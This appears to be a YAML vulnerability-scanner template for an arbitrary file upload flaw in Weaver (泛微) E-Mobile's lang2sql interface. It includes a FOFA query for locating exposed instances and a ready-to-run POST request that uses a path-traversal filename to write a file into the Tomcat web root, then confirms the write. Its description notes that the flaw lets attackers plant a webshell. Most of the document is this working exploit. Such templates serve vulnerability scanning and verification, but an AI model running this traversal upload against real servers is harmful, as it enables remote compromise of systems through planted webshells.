product: 泛微E-Mobile
vName: 泛微E-Mobile lang2sql接口存在任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: e-mobile可满足企业日常管理中的绝大部分管理需求，诸如市场销售、项目、采购、研发、客服、财务、人事、行政等；同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口，包括企业员工、供应商、代理商、合作伙伴、投资费以及终端客户等整个供应链条上的关系主体，满足为企业全方位的移动办公需求。该系统存任意文件上传漏洞，攻击者可通过此漏洞上传webshell木马远程控制服务器。
version: ''
note: ''
search:
  FOFA: app="泛微-EMobile" || icon_hash="2062026853"
protocol: http
link: https://blog.csdn.net/CommputerMac/article/details/134276212
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /emp/lang2sql?client_type=1&lang_tag=1
      header:
        Accept-Language: zh-CN,zh;q=0.9
        Expect: 100-continue
      file:
        file:
          - ../../../../appsvr/tomcat/webapps/ROOT/52e039302a62d077.txt
          - 95cc64dd2825f9df13ec4ad683ecf339
          - text/plain
    verify:
      path: /52e039302a62d077.txt
      logic: and
      check:
        - body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and